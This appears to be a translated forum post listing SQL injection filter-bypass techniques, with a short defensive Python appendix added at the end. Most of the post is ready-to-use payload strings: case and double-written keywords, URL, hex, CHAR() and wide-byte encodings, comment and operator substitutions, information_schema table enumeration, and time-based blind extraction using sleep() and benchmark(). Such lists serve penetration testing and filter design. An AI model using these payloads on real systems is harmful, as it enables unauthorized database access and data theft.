Posted by 铁佛 on 2023-7-31 22:12:40

SQL Injection Bypass Methods

Contents

[*]SQL Injection Bypass Methods

[*]I. Bypassing keywords
[*]II. Bypassing quotes
[*]III. Bypassing spaces
[*]IV. Bypassing logical operators
[*]V. Bypassing the equals sign
[*]VI. Bypassing greater-than, less-than and equals comparisons
[*]VII. Bypassing commas
[*]VIII. Bypassing functions


References:
https://blog.csdn.net/zizizizizi_/article/details/124094197
http://wed.xjx100.cn/news/143416.html?action=onClick
I. Bypassing keywords

1. Case variation
Example:
-1' UniOn SelEct 1,2#

2. Double writing (the keyword survives a filter that strips it once)
Example:
-1' uniunionon seselectlect 1,2#

3. URL encoding
Example:
?id=%2d%31%27%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%31%2c%32%23
?id=-1'+union+select+1%2C2%23
URL-decoded:
?id=-1' union select 1,2#

4. Inline comments
Example:
-1' /*!union*/ /*!select*/ 1,2#

II. Bypassing quotes

1. Hex encoding
Example:
-1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=0x64767761#

2. URL encoding
Example:
?id=%2d%31%27%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%31%2c%32%23
URL-decoded:
?id=-1' union select 1,2#

3. ASCII encoding (CHAR())
-1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=concat(CHAR(100),CHAR(118),CHAR(119),CHAR(97))#

4. Wide-byte bypass
-1%df' union select 1,2--+

III. Bypassing spaces

1. Comment sequences
Example:
-1'/**/union/**/select/**/1,2#

2. Inline comments
-1'/*!*/union/*!*/select/*!*/1,2#

3. Parentheses
-1' union(select(1),(2))#

4. Tab characters
-1'        union        select        1,2#

5. Two-space bypass
-1'unionselect1,2#

IV. Bypassing logical operators

1. Replacing and
1' & 1=1#
1' && 1=1#

2. Replacing or
1' || 1=1#

3. Replacing not
1' and 1!=2#

V. Bypassing the equals sign

Original form
-1' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#

1. like
-1' union select 1,group_concat(table_name) from information_schema.tables where table_schema like database()#

2. rlike
-1' union select 1,group_concat(table_name) from information_schema.tables where table_schema rlike database()#

3. regexp
-1' union select 1,group_concat(table_name) from information_schema.tables where table_schema regexp database()#

4. Not-equal (<>) with negation
-1' union select 1,group_concat(table_name) from information_schema.tables where !(table_schema<>database())#

VI. Bypassing greater-than, less-than and equals comparisons

Original form
1' and if(ascii(substr(database(),1,1))>100,sleep(2),0)#

1. greatest() and least()
greatest(n1, n2, n3, ...): returns the largest of its arguments
1' and if(greatest(ascii(substr(database(),1,1)),100)=100,sleep(2),0)#

least(n1, n2, n3, ...): returns the smallest of its arguments
1' and if(least(ascii(substr(database(),1,1)),100)=100,sleep(2),0)#

2. strcmp()
strcmp(str1, str2): returns 0 if the strings are identical, -1 if the first argument sorts before the second under the current collation, and 1 otherwise
1' and if(strcmp(ascii(substr(database(),1,1)),100)=0,sleep(2),0)#

3. The in keyword
1' and if(ascii(substr(database(),1,1)) in (100),sleep(2),0)#
1' and if(substr(database(),1,1) in ("d"),sleep(2),0)#

4. between ... and ...
1' and if(ascii(substr(database(),1,1)) between 90 and 100,sleep(2),0)#

5. like
1' and if(substr(database(),1,1) like "d%",sleep(2),0)#

VII. Bypassing commas

1. substr(str from pos for len): reads a substring of length len starting at position pos
1' and if(ascii(substr(database() from 1 for 1))=100,sleep(2),0)#

2. The join keyword
-1' union select * from (select 1)a join (select 2)b#

3. The like keyword
1' and if(database() like "%d%",sleep(2),0)#

4. The offset keyword
1' union select 1,2 limit 1 offset 0#
is equivalent to
1' union select 1,2 limit 0,1#

VIII. Bypassing functions

1. Replacing sleep()
(1) benchmark()
benchmark(count, expr): the first argument is the number of times to execute, the second is the expression to execute
1' and benchmark(1000000000,1)#

2. Replacing ascii()
(1) bin()
bin(): converts a number to binary
1' and if(bin(ascii(substr(database(),1,1)))=1100100,sleep(2),1)#

(2) hex()
hex(): converts to hexadecimal
1' and if(hex(substr(database(),1,1))=64,sleep(2),1)#

(3) ord()
ord(): returns the character code of the leftmost character of the given string
1' and if(ord(substr(database(),1,1))=100,sleep(2),1)#

3. Replacing group_concat()
(1) concat_ws()
concat_ws(separator, str1, str2):
-1' union select 1,concat_ws(",","@",table_name) from information_schema.tables where table_schema=database()#

(2) concat()
concat():
-1' union select 1,concat(table_name) from information_schema.tables where table_schema=database()#

4. Replacing substr()
(1) substring()
substring(str, pos, len):
1' and if(substring(database(),1,1)="d",sleep(2),1)#

(2) mid()
mid(str, pos, len):
1' and if(mid(database(),1,1)="d",sleep(2),1)#

(3) left()
left(str, len):
1' and if(left(database(),1)="d",sleep(2),1)#

(4) right()
right(str, len):
1' and if(right(database(),1)="a",sleep(2),1)#
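The defender's side of the tricks above, as an added example that is not part of this post or its references: a Python normaliser that undoes the encodings listed here (case, URL encoding, inline comments, hex and CHAR() literals) before keyword matching, a single-pass keyword stripper that shows why double writing works against it, and a parameterised query showing the mitigation that makes every one of these bypasses irrelevant. The sample payloads are the ones from the post; the users table, its contents and the function names are my own assumptions.

```python
import re
import sqlite3
from urllib.parse import unquote

# Constructed samples, one per encoding trick from the post above (not a WAF rule set).
SAMPLES = {
    "case":   "-1' UniOn SelEct 1,2#",
    "double": "-1' uniunionon seselectlect 1,2#",
    "urlenc": "?id=%2d%31%27%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%31%2c%32%23",
    "inline": "-1' /*!union*/ /*!select*/ 1,2#",
    "hex":    "-1' union select 1,2 from information_schema.tables where table_schema=0x64767761#",
    "char":   "-1' union select 1,2 where x=concat(CHAR(100),CHAR(118),CHAR(119),CHAR(97))#",
}
KEYWORDS = ("union", "select", "sleep", "benchmark", "information_schema")

def strip_once(s):
    """A single-pass keyword remover: exactly the kind of filter double writing defeats."""
    for kw in KEYWORDS:
        s = s.replace(kw, "")
    return s

def normalize(s):
    """Canonicalise input before matching by undoing the encodings the post lists."""
    s = unquote(unquote(s)).lower()                        # URL-decode twice (double encoding), fold case
    s = re.sub(r"/\*!?(.*?)\*/", r" \1 ", s, flags=re.S)   # /*!union*/ -> union, /**/ -> a space
    s = re.sub(r"\b0x((?:[0-9a-f]{2})+)\b",                # 0x64767761 -> 'dvwa'
               lambda m: "'" + bytes.fromhex(m.group(1)).decode("latin-1") + "'", s)
    s = re.sub(r"char\((\d+)\)",                           # char(100) -> 'd'
               lambda m: "'" + chr(int(m.group(1))) + "'", s)
    return re.sub(r"\s+", " ", s).strip()                  # tabs, newlines, comment gaps -> one space

def detect(s):
    """SQL keywords present after normalisation: a heuristic for alerting, not a proof of safety."""
    n = normalize(s)
    return [kw for kw in KEYWORDS if kw in n]

def safe_lookup(user_input):
    """The real fix: bind the value as a parameter, so every payload above is handled as data."""
    conn = sqlite3.connect(":memory:")          # hypothetical users table, constructed in memory
    conn.execute("CREATE TABLE users(id TEXT, name TEXT)")
    conn.execute("INSERT INTO users VALUES ('1', 'alice')")
    rows = conn.execute("SELECT name FROM users WHERE id = ?", (user_input,)).fetchall()
    conn.close()
    return [r[0] for r in rows]
```

Run detect() over a request log to see which of the post's encodings your current filter would have missed; the parameterised query is what removes the problem rather than chasing encodings.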